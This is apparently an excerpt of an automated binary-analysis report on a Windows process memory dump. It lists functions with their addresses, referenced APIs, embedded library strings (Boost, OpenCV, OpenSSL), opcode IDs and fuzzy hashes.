API ID: std::_$ByteCharDeallocateFormatH_prologMessageMultiWideWinerror_message
String ID: unknown error
API String ID: 2358782872-3078798498
Opcode ID: 4a9aa99e8dc0fc38da99ef78f619a88cff9fff45b5bbdcc5bf243b138044898a
Instruction ID: 1df9f156948607634ffa1fff74d16928dbfd276890fcc7a6db3c5de01e4ab483
Opcode Fuzzy Hash: 4a9aa99e8dc0fc38da99ef78f619a88cff9fff45b5bbdcc5bf243b138044898a
Instruction Fuzzy Hash: 5E215CB2901209EBDB00EF99D9919EEFBB8FF58354F04042EE505A7211DB745A88CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004C8586, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004C858B

Part of subcall function 004A65FB: __EH_prolog.LIBCMT ref: 004A6600

Part of subcall function 004A6306: __EH_prolog.LIBCMT ref: 004A630B

Strings

,L, xrefs: 004C85DC
R8J, xrefs: 004C85B5

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: ,L$R8J
API String ID: 3519838083-1964178626
Opcode ID: 03ace888ad956bf0309672069c165e67b26e3d0545a859a7967967c9625f048b
Instruction ID: 3ec5f5a9e71977e5ad07c8f775a4826ed87a69183a665ff35684f94c99d197cc
Opcode Fuzzy Hash: 03ace888ad956bf0309672069c165e67b26e3d0545a859a7967967c9625f048b
Instruction Fuzzy Hash: BC217FB1A00208DFDB14DF69C985A6ABBF9FF89304F10856EE445DB342D7B59E01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 004A11E2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004A11E7

Part of subcall function 004A6580: __EH_prolog.LIBCMT ref: 004A6585

Part of subcall function 004A6306: __EH_prolog.LIBCMT ref: 004A630B

Strings

lL, xrefs: 004A123E
R8J, xrefs: 004A1218

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: R8J$lL
API String ID: 3519838083-1997904659
Opcode ID: 16bec9857c3e6cf74c54273626f9f1af584566491be0a875a0d6f64e677972d0
Instruction ID: 9a39c82d9e577dfaac598cbec3d0dc1a03641512fb240cf4e4fa8bad05335333
Opcode Fuzzy Hash: 16bec9857c3e6cf74c54273626f9f1af584566491be0a875a0d6f64e677972d0
Instruction Fuzzy Hash: 7E216BB1A00204DFEB24DF69C584A6ABBF9FF85304B1089AEE455DB252D3B5DE01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0051E190, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0051E195

Strings

%s:%d: error: (%d) %s in function %s, xrefs: 0051E1D3
%s:%d: error: (%d) %s, xrefs: 0051E208

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: %s:%d: error: (%d) %s$%s:%d: error: (%d) %s in function %s
API String ID: 3519838083-3777411579
Opcode ID: d4364a0fd855272f1231433a77b1b57b3cb977a4cbe124b5e1c4c23cafc13c3a
Instruction ID: 4a51dedfdb6bc4c3a0245ccb3385801cf713e5145241c6b7b05351dd67d89b0a
Opcode Fuzzy Hash: d4364a0fd855272f1231433a77b1b57b3cb977a4cbe124b5e1c4c23cafc13c3a
Instruction Fuzzy Hash: 4B219271540604EFEB18DF54C846EEABBBAFB05304F40095DE412975E2D376EAC4CB94

Uniqueness

Uniqueness Score: -1.00%

Function 005C6880, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

GetFileAttributesExW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,004C84C9,?,?,00000000,00000000), ref: 005C68A7
GetLastError.KERNEL32(?,?,?,?,004C84C9,?,?,00000000,00000000), ref: 005C68B1

Strings

boost::filesystem::file_size, xrefs: 005C68BB, 005C68F1

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AttributesErrorFileLast
String ID: boost::filesystem::file_size
API String ID: 1799206407-1937220381
Opcode ID: 31fd8117633d8748ac190b4eabb80b9b8daf58453d9365a01653caff3d17b8fc
Instruction ID: 72572d005d4ad20244764a4dc8e21949a16d03edb4ce07a69efbf2a40e6ded56
Opcode Fuzzy Hash: 31fd8117633d8748ac190b4eabb80b9b8daf58453d9365a01653caff3d17b8fc
Instruction Fuzzy Hash: D211E531A052006FDB10AB75CC06F6B3BE9EFDA728F840E4DF449D7282E634D9428692

Uniqueness

Uniqueness Score: -1.00%

Function 00681177, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 0068150D
___raise_securityfailure.LIBCMT ref: 006815F4

Strings

H%y, xrefs: 006815EF

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: H%y
API String ID: 3761405300-1088560149
Opcode ID: 329975a5e60b7a6ced549f833fbc68a489c482e542c282c5c08e70d6b14643bf
Instruction ID: 4cffec9cbf81c764c2c07e3e80ae0de69cca5727c7b22427f596f53d64fa06bb
Opcode Fuzzy Hash: 329975a5e60b7a6ced549f833fbc68a489c482e542c282c5c08e70d6b14643bf
Instruction Fuzzy Hash: DB21F8B5541204AAD714EF19E995A507BF4BB08310F60C16BE5088BFB2E37C5987CF4D

Uniqueness

Uniqueness Score: -1.00%

Function 0042363F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00423644
__To_byte.LIBCPMT ref: 00423680

Strings

invalid wchar_t filename argument, xrefs: 0042368B

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prologTo_byte
String ID: invalid wchar_t filename argument
API String ID: 2823267341-1601001258
Opcode ID: 09c31b9a0d74001a5038710e5e36e83a12512e7b6bc9cf077262866e0feb944c
Instruction ID: 36a43c1cd4b69cab585d945c12e25a5841389da05bf81f5fcdd7e309c16e2460
Opcode Fuzzy Hash: 09c31b9a0d74001a5038710e5e36e83a12512e7b6bc9cf077262866e0feb944c
Instruction Fuzzy Hash: DE117CB2901209AADB14EF99D9916FEFBB8FF59314F10016FE404A7201D7745B888BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004AFCC5, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 004AFD46

Strings

rhs.IsString(), xrefs: 004AFD06
IsString(), xrefs: 004AFCE4

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _memcmp
String ID: IsString()$rhs.IsString()
API String ID: 2931989736-3903486248
Opcode ID: 9205f3926940e85cbbf504cf46e0afe88e53bc60394bf35f91af403eae5fd0e3
Instruction ID: b2bf388042a16ba295338b8f8c9cc05bb0864ffbd5c3e70bc74a9fb8ae2cff4e
Opcode Fuzzy Hash: 9205f3926940e85cbbf504cf46e0afe88e53bc60394bf35f91af403eae5fd0e3
Instruction Fuzzy Hash: E901DB76B44205367E0031E59D8287E634DDBB7BACB14003BF90797382F99D9C0692AE

Uniqueness

Uniqueness Score: -1.00%

Function 0042534E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

Part of subcall function 0042542B: __EH_prolog.LIBCMT ref: 00425430
Part of subcall function 0042542B: EnterCriticalSection.KERNEL32(?), ref: 00425444
Part of subcall function 0042542B: LeaveCriticalSection.KERNEL32(?), ref: 00425472
Part of subcall function 0042542B: CloseHandle.KERNEL32(00000004), ref: 00425497

DeleteCriticalSection.KERNEL32(?,?,0000001C,00000004,004253F8,?,0000000C,00000003,0042458C,?,?,?,006B37B2,000000FF), ref: 004253C2

Strings

IA, xrefs: 004253D0
NSB, xrefs: 0042536D

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CriticalSection$CloseDeleteEnterH_prologHandleLeave
String ID: NSB$IA
API String ID: 1975924688-1714093477
Opcode ID: 2a4d33a94110931a7f58db9e7381a10ef2a5133b139236f25522b736e0e7fd8f
Instruction ID: ad83f70afcdeb8132085fc4e580e013356fda8066906041df9edcfad394663b3
Opcode Fuzzy Hash: 2a4d33a94110931a7f58db9e7381a10ef2a5133b139236f25522b736e0e7fd8f
Instruction Fuzzy Hash: D2115970A44754FBE320EF94E806F8ABBE8EB04710F10465EF581A76C2DBF81604C798

Uniqueness

Uniqueness Score: -1.00%

Function 0042AA25, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042AA2A

Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC

Strings

open, xrefs: 0042AA6C
YX, xrefs: 0042AA72

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: DeallocateH_prologstd::_
String ID: YX$open
API String ID: 3881773970-1557675587
Opcode ID: 8d3470c885da1869f78ce01b570e3d442b7f990167d0568cef093c626b296255
Instruction ID: 05ea60a182587b6d571324af431238b117a96fe565803f4d302613a16e9cf9cd
Opcode Fuzzy Hash: 8d3470c885da1869f78ce01b570e3d442b7f990167d0568cef093c626b296255
Instruction Fuzzy Hash: E4018CB1A41208AEDB00DFA9D9819EEFBB8EF94744F1080AEF805A3201C7740F40CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 004A20E1, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004A20E6

Part of subcall function 004A65FB: __EH_prolog.LIBCMT ref: 004A6600

Part of subcall function 004A653A: __EH_prolog.LIBCMT ref: 004A653F

Strings

R8J, xrefs: 004A210F
<L, xrefs: 004A2139

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: <L$R8J
API String ID: 3519838083-315383820
Opcode ID: c1dee0a14b4748abad44c297e92726812392bc50cca4f97a02d1f057999369b7
Instruction ID: 73cc06e85bbee2e07c60c02e207811534bbedcdce0be2836b5243923bd4b0b8b
Opcode Fuzzy Hash: c1dee0a14b4748abad44c297e92726812392bc50cca4f97a02d1f057999369b7
Instruction Fuzzy Hash: 691115B1A1420AAFCB18DF6CD9059AAFBF9FF49300B10466FE014D7351E7B0AA008B94

Uniqueness

Uniqueness Score: -1.00%

Function 0052A696, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0052A69B

Part of subcall function 0051E245: __EH_prolog.LIBCMT ref: 0051E24A

Part of subcall function 0051E077: __EH_prolog.LIBCMT ref: 0051E07C

Part of subcall function 0051E2A2: __CxxThrowException@8.LIBVCRUNTIME ref: 0051E397

Strings

Failed to allocate %lu bytes, xrefs: 0052A6CF
cv::OutOfMemoryError, xrefs: 0052A6BD

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$Exception@8Throw
String ID: Failed to allocate %lu bytes$cv::OutOfMemoryError
API String ID: 1007369359-255125719
Opcode ID: fed0f71012ed15a30a5eab3e64d35d165605fe29a58ae3fe82280f94a7b88c3c
Instruction ID: bd45c75c13a506ddedde14e23246cd1d47ee49e4212610359232e599acb10d2f
Opcode Fuzzy Hash: fed0f71012ed15a30a5eab3e64d35d165605fe29a58ae3fe82280f94a7b88c3c
Instruction Fuzzy Hash: B201B572C01218AAEB18EBE8C81AFED7B7CAF55310F14425DF111A74C2EBB45B48C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 0051E39D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0051E3A2
std::exception::exception.LIBCMT ref: 0051E3B3

Part of subcall function 0040F368: ___std_exception_copy.LIBVCRUNTIME ref: 0040F386

Strings

UQ, xrefs: 0051E3C3

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog___std_exception_copystd::exception::exception
String ID: UQ
API String ID: 238416039-1003023986
Opcode ID: ce7a09c161f5e78f5827d4d17a1c6ce777412c4baba27c43f7dfd2d8de95b243
Instruction ID: 1a7119e1c6a27d520ac01035e1235c2479b8747ccfe67e393bb2c2e6f8699c21
Opcode Fuzzy Hash: ce7a09c161f5e78f5827d4d17a1c6ce777412c4baba27c43f7dfd2d8de95b243
Instruction Fuzzy Hash: 371170B1800648EBC715DFA9C554AEAFBF8FF18314F00866FE10193651DB74BA05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0041326E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00413273

Strings

89A, xrefs: 004132C7
H9A, xrefs: 004132BC

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: 89A$H9A
API String ID: 3519838083-511708026
Opcode ID: c168ce6a50e2bd7f468d07cc7223450e1b2b6964264329510ea78c9271fff4b2
Instruction ID: ea665d1dfad8793eb2e8913838667f9b536d4809cdf04bc8bf3ae534165a2351
Opcode Fuzzy Hash: c168ce6a50e2bd7f468d07cc7223450e1b2b6964264329510ea78c9271fff4b2
Instruction Fuzzy Hash: F3117CB1901344AFCB24DF59C408A9ABBF5FF48324F10825EE0899B651D7B4DA45CF84

Uniqueness

Uniqueness Score: -1.00%

Function 004133D3, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004133D8

Strings

@9A, xrefs: 0041342C
(9A, xrefs: 00413421

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: (9A$@9A
API String ID: 3519838083-2001585676
Opcode ID: 6aa6f121a1d695fcdca836fe4d220a024a0ad977975ac764071f5b4aeaf9eb79
Instruction ID: d47adf42b0b7606d2d0f34f69079a8abe63bff88bfebb202fd3704411650e426
Opcode Fuzzy Hash: 6aa6f121a1d695fcdca836fe4d220a024a0ad977975ac764071f5b4aeaf9eb79
Instruction Fuzzy Hash: 961197B1A01344ABCB24CF59C408A9ABFF5FF48328F00825EE0899B651D7B1DA44CF84

Uniqueness

Uniqueness Score: -1.00%

Function 004134F6, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004134FB

Strings

89A, xrefs: 0041354F
H9A, xrefs: 00413544

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: 89A$H9A
API String ID: 3519838083-511708026
Opcode ID: ba2fbb5836d14f7eba1c3757845270304c9d14112b41ef0ed2eb053d7e9afb6f
Instruction ID: 31fa910b9a499a39054fe65aace537cf043c855999afc4b739d099bc1f4eb3e0
Opcode Fuzzy Hash: ba2fbb5836d14f7eba1c3757845270304c9d14112b41ef0ed2eb053d7e9afb6f
Instruction Fuzzy Hash: 931179B1A01748EFCB24DF59C408A9ABBF5FF48328F10865EE0899B251D7B0DA45CF84

Uniqueness

Uniqueness Score: -1.00%

Function 00413583, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00413588

Strings

@9A, xrefs: 004135DC
(9A, xrefs: 004135D1

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: (9A$@9A
API String ID: 3519838083-2001585676
Opcode ID: 66a8b6e8c98be6b7817893fdd9e555bd3509fee2602904c08f73dd5fb1c46709
Instruction ID: be5b62fb1456114bf07650fd7650c075b186e78b15e58ca54ed3e35cf0f35174
Opcode Fuzzy Hash: 66a8b6e8c98be6b7817893fdd9e555bd3509fee2602904c08f73dd5fb1c46709
Instruction Fuzzy Hash: 4C1157B1A01344EFCB24CF59C408A9ABBF6FF48328F10465EE0999B651D7B1DA44CB84

Uniqueness

Uniqueness Score: -1.00%

Function 004152B4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000), ref: 004152DB
GetLastError.KERNEL32 ref: 004152E5

Part of subcall function 0041046E: __EH_prolog.LIBCMT ref: 00410473

Strings

pqcs, xrefs: 004152FF

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CompletionErrorH_prologLastPostQueuedStatus
String ID: pqcs
API String ID: 1288862127-2559862021
Opcode ID: 064c07d6d307faf5420f5d9ae78d47ffd42d81725f203b2e952264f828ffdbab
Instruction ID: 9e0eaae68fea76848ff6e78d8ba0fb33c82bcf1ffee4b9ae909bc97304c7d929
Opcode Fuzzy Hash: 064c07d6d307faf5420f5d9ae78d47ffd42d81725f203b2e952264f828ffdbab
Instruction Fuzzy Hash: 8F01D670E11128AF8B21AF6698449ABBBBDEF8075431040BBEC00CB211DB74CD428BE1

Uniqueness

Uniqueness Score: -1.00%

Function 004126B5, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004126BA

Part of subcall function 00412730: __EH_prolog.LIBCMT ref: 00412735

Part of subcall function 00410F94: __EH_prolog.LIBCMT ref: 00410F99

Strings

u*A, xrefs: 00412713
h9A, xrefs: 00412705

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: h9A$u*A
API String ID: 3519838083-1879692700
Opcode ID: db52d1c5c2ae16a619431f1894027530a01a7933d8423c3cf4af9209c73fc0ed
Instruction ID: 30fa7b6a3b7c53ff41c69dd53e005fc6ebd96bc375081e1702ab0f276cc7e161
Opcode Fuzzy Hash: db52d1c5c2ae16a619431f1894027530a01a7933d8423c3cf4af9209c73fc0ed
Instruction Fuzzy Hash: A0012FB2A02644EEC714DF18DA00AEABBF9FB85710F10867EE05587640DBF46A08CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0041EFFA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041EFFF
new.LIBCMT ref: 0041F015

Strings

0A, xrefs: 0041F036

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: 0A
API String ID: 3519838083-538879246
Opcode ID: f4b35525397ce1c50f7ff550337af0e4fbd96fa7484d6b3c40bfd606653f8539
Instruction ID: 5802c82f5fe659b7da1550a7db9f1a9f3b37c9e2d3429001af10d3bc13beece2
Opcode Fuzzy Hash: f4b35525397ce1c50f7ff550337af0e4fbd96fa7484d6b3c40bfd606653f8539
Instruction Fuzzy Hash: BE017CB1905346EED754DFA9854169EFFF4FF14310F20867EE09993641D7B05A00CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00412C4E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00412C53
new.LIBCMT ref: 00412C66

Strings

l4A, xrefs: 00412C87

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: l4A
API String ID: 3519838083-75327911
Opcode ID: 1e804d4c31ff69ca688a837d2239034ed0578904f3d410898d77381d49f4311e
Instruction ID: c5d238e506a2a8b2c9d407fa5e83167de6b9c73ac9b64205e1781a55565a0943
Opcode Fuzzy Hash: 1e804d4c31ff69ca688a837d2239034ed0578904f3d410898d77381d49f4311e
Instruction Fuzzy Hash: 5501B1B1941348DED720DF49D54179EFFB4FB50320F20866FE49997251D7B41A00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00412F31, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00412F36

Strings

@9A, xrefs: 00412F86
(9A, xrefs: 00412F7C

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: (9A$@9A
API String ID: 3519838083-2001585676
Opcode ID: 0c8922dd9310501aee7451642b2e26ad0c899acd641aabe76e7ad0d39991177d
Instruction ID: a68009c1a1feec2bba006e04fca7164bbdc261624b1552e6f84e8125858bb381
Opcode Fuzzy Hash: 0c8922dd9310501aee7451642b2e26ad0c899acd641aabe76e7ad0d39991177d
Instruction Fuzzy Hash: 840165B1A11708DFC724CF59C548AAABBF1FB08328F00866EE0999B750D3B4DA048F94

Uniqueness

Uniqueness Score: -1.00%

Function 0041300C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00413011

Strings

89A, xrefs: 00413061
H9A, xrefs: 00413057

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: 89A$H9A
API String ID: 3519838083-511708026
Opcode ID: 159bc668f376c5f98e375d80a79d1708912a16b84cd3cfec886982fb48a42a8a
Instruction ID: fec7219dc86b975970baf3b2fc9c19d62cc90f2772644c3ef16286538034ffd2
Opcode Fuzzy Hash: 159bc668f376c5f98e375d80a79d1708912a16b84cd3cfec886982fb48a42a8a
Instruction Fuzzy Hash: D90165B1A017089FCB24CF59C548BAABBF1FB08369F10825DE4899B341C3B4DA04CF94

Uniqueness

Uniqueness Score: -1.00%

Function 006A2A22, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

Strings

i^, xrefs: 006A2A24
J+q, xrefs: 006A2A48

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID: J+q$i^
API String ID: 0-3312758804
Opcode ID: 71e4437e6e815a44885ef94682864cc39af73130d47e68e7b579062aa29139df
Instruction ID: 8173f69f2cb0745e6e3fd2ce2e02995bbb1eb8483d2723ec8fa3ce2bbaece66e
Opcode Fuzzy Hash: 71e4437e6e815a44885ef94682864cc39af73130d47e68e7b579062aa29139df
Instruction Fuzzy Hash: 01F02B35140109AADB20AB95CC10AF973A9DF04700F50406AFD45C7190E6748E81D769

Uniqueness

Uniqueness Score: -1.00%

Function 005D7E30, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON

Download Yara Rule

APIs

DeleteFiber.KERNEL32 ref: 005D7E6A

Strings

crypto\async\async.c, xrefs: 005D7E58, 005D7E6E
_{], xrefs: 005D7E3E

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: DeleteFiber
String ID: _{]$crypto\async\async.c
API String ID: 617949143-63007400
Opcode ID: 3126086a839d91186cf088ac5bcac268331bd9d093595b2203a52f3fe8208ed8
Instruction ID: 1d4a724b94ca40e3d74fa8bf8f083e4e4665567ca095b458fbec625cab1ce541
Opcode Fuzzy Hash: 3126086a839d91186cf088ac5bcac268331bd9d093595b2203a52f3fe8208ed8
Instruction Fuzzy Hash: 12F02B76609219AFD23116A8FC43F57BF5BFFC4724F24456BF9082536AE3635C209582

Uniqueness

Uniqueness Score: -1.00%

Function 0041084D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00410854
GetLastError.KERNEL32 ref: 00410863

Part of subcall function 0041046E: __EH_prolog.LIBCMT ref: 00410473

Strings

tss, xrefs: 0041087D

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AllocErrorH_prologLast
String ID: tss
API String ID: 249634027-1638339373
Opcode ID: b34a9548f67f283ab08696d3990e6c1d1568906a9a493e4aa40b7b8786f7126f
Instruction ID: 98cef0cfa959938077b9adb9386da5cf655fc4989418048a239e4903bd42ffd6
Opcode Fuzzy Hash: b34a9548f67f283ab08696d3990e6c1d1568906a9a493e4aa40b7b8786f7126f
Instruction Fuzzy Hash: AEF0EC75E012145BC7107B7A988849EFFF9EE8933071082B7E805D3341DA748C858BD1

Uniqueness

Uniqueness Score: -1.00%

Function 004129F2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004129F7

Part of subcall function 00412866: __EH_prolog.LIBCMT ref: 0041286B

Part of subcall function 004104B3: __EH_prolog.LIBCMT ref: 004104B8

Strings

`9A, xrefs: 00412A37
pgn, xrefs: 00412A0F

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: `9A$pgn
API String ID: 3519838083-2871743745
Opcode ID: b2fecd1266f543603e9521737e2a8cd244d2f875a1214f07ff6b10434068a1e0
Instruction ID: 503796389406103eb3dc2dbd790cc92a40f341a81ab2c2a9bfe85f9daa9b9ee7
Opcode Fuzzy Hash: b2fecd1266f543603e9521737e2a8cd244d2f875a1214f07ff6b10434068a1e0
Instruction Fuzzy Hash: E8F049B1902284EECB04DF4ADA856D9BFB9FF25359F4081ADE4048B282C7B54A44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 005701FF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00570204

Part of subcall function 00571066: __EH_prolog.LIBCMT ref: 0057106B

_strlen.LIBCMT ref: 00570226

Strings

Portable image format (*.pbm;*.pgm;*.ppm;*.pxm;*.pnm), xrefs: 0057021A, 0057021F, 0057022D

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$_strlen
String ID: Portable image format (*.pbm;*.pgm;*.ppm;*.pxm;*.pnm)
API String ID: 1490583215-1029613475
Opcode ID: b692a73fac3b166a7843bf0abdfac67d198d9e360a481c65b166ef46904128d6
Instruction ID: 774038f328b8f44c2029233f416f440cbbda194dad175b5e76ee3f72a959020a
Opcode Fuzzy Hash: b692a73fac3b166a7843bf0abdfac67d198d9e360a481c65b166ef46904128d6
Instruction Fuzzy Hash: AFF0A0729006509BE314AF5DE906BEAFBBCEF81720F10026EB45593292DBF45A4087A8

Uniqueness

Uniqueness Score: -1.00%

Function 0056E362, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0056E367

Part of subcall function 00571066: __EH_prolog.LIBCMT ref: 0057106B

_strlen.LIBCMT ref: 0056E389

Strings

Windows bitmap (*.bmp;*.dib), xrefs: 0056E37D, 0056E382, 0056E390

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$_strlen
String ID: Windows bitmap (*.bmp;*.dib)
API String ID: 1490583215-3219066399
Opcode ID: d3e53d685dbc610e2bb53ce7597d3dd20ce2d0ec97616316db032bfa9ad1e898
Instruction ID: c8baf0102356ce20d9637c5943ca7825a5ae62a7b54ae4d8601941ca6e006ee3
Opcode Fuzzy Hash: d3e53d685dbc610e2bb53ce7597d3dd20ce2d0ec97616316db032bfa9ad1e898
Instruction Fuzzy Hash: B4F027719005809BD314AF4CE8066AEFBBCEF80720F10026EB41193241DBF41A4087A4

Uniqueness

Uniqueness Score: -1.00%

Function 00570788, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0057078D

Part of subcall function 00571066: __EH_prolog.LIBCMT ref: 0057106B

_strlen.LIBCMT ref: 005707AF

Strings

TIFF Files (*.tiff;*.tif), xrefs: 005707A3, 005707A8, 005707B6

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$_strlen
String ID: TIFF Files (*.tiff;*.tif)
API String ID: 1490583215-969518115
